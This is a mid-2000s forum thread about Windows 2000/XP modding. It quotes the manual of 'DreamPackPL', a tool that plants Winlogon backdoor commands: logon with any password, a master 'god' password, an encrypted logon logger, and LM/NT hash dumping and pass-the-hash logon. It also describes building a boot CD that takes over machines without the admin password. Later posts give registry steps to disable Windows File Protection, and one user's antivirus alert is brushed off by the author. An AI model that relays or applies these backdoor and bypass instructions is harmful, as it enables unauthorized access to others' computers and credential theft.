How to fully disable System File Checker (SFC, WFP

[Yurek3]

DreamPackPL (version 2oo4.o6.1o)

Damian Bakowski

e-mail: d--b@wp.pl

web: www.d--b.webpark.pl

This tool is FREE for non-commercial usage.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND.

YOU USE THIS SOFTWARE ONLY FOR OWN RISK.

REQUIREMENTS

------------

- Windows 2000, XP

- Windows installation CD

Note!

To get access to Windows XP, You can use also CD from Windows 2000.

CONTENT

-------

- DreamPack.exe 87050 bytes

- sfcfiles.dll 39424 bytes

INSTALLATION

------------

1) Install

Installation on current machine. You must have admin rights. After installation you must reboot system.

2) Create CD

Create from original Windows Installation CD new bootable CD with DreamPackPL. From this CD you can boot every machine with 2000/XP system without knowing admin password.

How to create new Windows installation CD for DreamPackPL:

You can create this CD with program DremPackPL only in Windows 2000/XP.

DreamPackPL will need 400-600MB free space for creating ISO image.

After image file is created, You can burn it with any program.

* boot from CD

After boot from CD You must choose system in Recovery Console.

Console will accept every admin password.

You can change current directory

> cd system32

You should also make backup of sfcfiles.dll

(backup file sfcfiles.lld will be used during uninstalling)

> ren sfcfiles.dll sfcfiles.lld

Then You must copy from CD file pinball.ex_ into system32 directory with change file name to sfcfiles.dll

> copy x:\i386\pinball.ex_ sfcfiles.dll

(x - CD drive letter; 'map' command display all drive letters)

Finally You can write 'exit' command and reboot computer.

Note!

All time You use DreamPackPL, Windows File Protection will be disabled.

3) Extract

Extract file SFCFILES.DLL to selected path.

If you use other software to boot system or have FAT partition, then you can manually replace sfcfiles.dll on target system.

--

Configuration of DreamPackPL is stored in registry in encrypted form end protected from deleting or change. While uninstalling this configuration is removed from registry.

Log file created by Logon Logger is also encrypted.

COMMANDS DESCRIPTION

--------------------

Commands can be entered in edit-boxes "User Name" or "Password" in Winlogon window.

Commands are not case-sensetive. Command can have 1-15 characters.

Every command's character sequence can be changed.

Every command can be deactivated (except DreamOn).

Only DreamOn command is initially activated.

Command types:

--> DreamOn - default "dreamon"

Display DreamPackPL window at logon desktop.

--> PassOn - default "passon"

Turn on standard logon mode - user name and password are requiered.

--> PassOff - default "passoff"

Turn on logon mode without need to enter valid password. User will be logged on with wrong password and hash (LM+NT).

Entering this command in "Password" edit-box will cause automatic password acceptation.

--> LogonLoggerOn - default "logonloggeron"

Turn on Logon Logger.

--> LogonLoggerOff - default "logonloggeroff"

Turn off Logon Logger.

--> DreamDesktop - default "dreamdesktop"

Create (and/or switch) new desktop for system account and load Explorer shell.

--> God-Password - default "god"

This command-password is a master password and will be always accepted.

User will be logged on with wrong password and wrong hash (LM+NT) independent from current logon mode.

MENU DESCRIPTION

----------------

--> Passwords <--

-----> Normal checking

Standard logon mode - user name and password are requiered. [command PassOn]

-----> Logon with wrong password and hash

Logon mode without need to enter valid password. User will be logged on with wrong password and hash (LM+NT). [command PassOff]

-----> Logon with given hash

Standard logon mode, additional with possibility to enter hash (LM+NT) - when password is unknown, but hash (LM+NT) is known. User will be logged on with given (wrong) password and given hash.

-----> Hash Calculator

Compute hash (LM+NT) from given password.

-----> Hash Audit

Display users list and hashes (LM+NT).

--> Accounts <--

-----> Windows accounts panel

Display standard system accounts edit window.

--> Logon Logger <--

-----> Use Logon Logger

Turn on/off Logon Logger (initially deactivated). [commands LogonLoggerOn, LogonLoggerOff]

-----> Log file view and settings

Display Logon Logger settings window.

-----> Delete file

Delete Logon Logger log file.

--> Execute <--

-----> Console

Execute Console

-----> Regedit

Execute Regedit

-----> Task Manager

Execute Task Manager

-----> Sysedit

Execute System Configuration Editor

-----> Notepad

Execute Notepad

-----> Calculator

Execute Calculator

-----> Explorer shell

Load Explorer shell

-----> Other...

Execute selected program.

--> Desktops <--

-----> Create (switch to) DreamPackPL desktop

Create (and/or switch) new desktop for system account and load Explorer shell. [command DreamDesktop]

--> Commands <--

-----> Commands settings

Display commands settings window

--> Uninstall DreamPackPL <--

Uninstall DreamPackPL.

UNINSTALLING

------------

There is no need to boot again from CD. Just select "Uninstall DreamPackPL" from menu and reboot system.

Old file sfcfiles.dll will be recovered from sfcfiles.lld (after reboot this backup file will be deleted). If backup file not exist, DreamPackPL will try recover file sfcfiles.dll from system32/dllcache directory.

http://www.d--b.webpark.pl/reverse04_en.htm

http://www.d--b.webpark.pl/dreampackpl_en.htm

http://www.d--b.webpark.pl/reverse01_en.htm

Good luck

[Yurek3]

How to fully disable System File Checker (SFC, WFP).

The method with patching sfc_os.dll (or sfc.dll) file dont disable fully WFP. Protected files can be replaced only manually. If any installator will use function MoveFileEx (with MOVEFILE_DELAY_UNTIL_REBOOT flag) to replace in-use protected files, then the files will be not replaced. The reason for this is, that session manager (smss.exe) while loading system, before replace any files, check list of protected files. If given file is in this list, then replace will fail. Until you add to registry AllowProtectedRenames value, the protected files will be not replaced.

Second often used function is SetupInstallFile (with SP_COPY_FORCE_IN_USE flag). This function before add a file to replace-list, check with SfcIsFileProtected (from sfc_os.dll) whether the file is protected or not. If file sfc_os.dll is patched, then SfcIsFileProtected will return always false. So SetupInstallFile will no add AllowProtectedRenames value to the registry.

I have develop my own method to full disabling WFP. This method is simple, more flexible and dont need to patch any files. It based on empty list of protected files. So WFP is on, but list of protected files is empty and all files are not protected. List of protected files is in file sfcfiles.dll. I have wrote my own sfcfiles.dll file with empty list. One thing that is to do, is replace this one file.

How replace sfcfiles.dll file ?

This file is a in-use protected file. To replace it, you need copy my sfcfiles0.dll into system directory and add two values to this key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager

After reboot, WFP will be fully disabled.

To add this two values to registry you must have admin rights. And dont forget to make backup of old sfcfiles.dll.

1)

Value name: PendingFileRenameOperations

Value type: array of null-terminated strings (REG_MULTI_SZ)

Value data:

\??\c:\winnt\system32\sfcfiles0.dll

!\??\c:\winnt\system32\sfcfiles.dll

This value is used to replace files at reboot time.

In first line is a path to the file that should be moved. In second line is new path for this file.

Note: Creating a value of REG_MULTI_SZ type in registry editor is available from XP version. To replace this file in Windows 2000 use automatic installation descripted below.

2)

Value name: AllowProtectedRenames

Value typ: DWORD (REG_DWORD)

Value data:

1

This value is needed to replace protected file.

And that is all.

Automatic installation mode for Windows 2000 user (work also in XP).

I have added two functions to sfcfiles0.dll file: Install and Uninstall. These functions will add two values to registry. Before calling these functions, file sfcfiles0.dll should be in system directory.

Function: Install

Calling: Select a command "Execute..." from start menu (or in command prompt) and enter:

rundll32 sfcfiles0 Install

First, this function will make backup of old sfcfiles.dll file to system32\dllcache directory, and add two registry values. If file sfcfiles.dll exist already in dllcache, then it will be not overwrite. After reboot file sfcfiles0.dll will be renamed to sfcfiles.dll.

Function: Uninstall

Calling: Select a command "Execute..." from start menu (or in command prompt) and enter:

rundll32 sfcfiles Uninstall

This function copy in dllcache the file sfcfiles.dll to sfcfiles.tmp. This temporary file will be moved after reboot to system32 directory. File sfcfiles.dll (with empty list) from system directory will be copyed to sfcfiles0.dll..

http://www.d--b.webpark.pl/reverse04_en.htm

Edited September 13, 2005 by Yurek3

[Nepali]

i didn't got ur english.....

[Nepali]

what should be done to fully disable SFC and WFC,,

shall i replace the sfcfiles,dll with yours.

will this disable SFC, WFP

i want it to be included in UACD.. HOW ?

[Nepali]

my antivirus detected it..

it not worthy..........

is there no other way to fullyy disable SFC, WFP

[Yurek3]

It isn't trojan. M$ doesn't like such files and he gave them trojan for antyvir campaigns

Trojan wants going outside in order to seize check-ups above this computer. this file isn't doing it.

He is only showing wasps, that niem of no files to protection.

Edited September 17, 2005 by Yurek3

[Nepali]

The simplest way to disable SFC, WFP:-

****************************************

This file will completely disable SFC, WFP

without having any registry settings

and

also no tension of antivirus.... popups..

just replace original file with this one .. or u can simply place this in ur i386 folder.

enjoy....

SFC_OS.dll

[cyberloner]

sorry asking a stupic question...

why need to disable it?

[Nepali]

yeah thats stupid...

coz i modify my windows XP

xpize + ryans + modified core files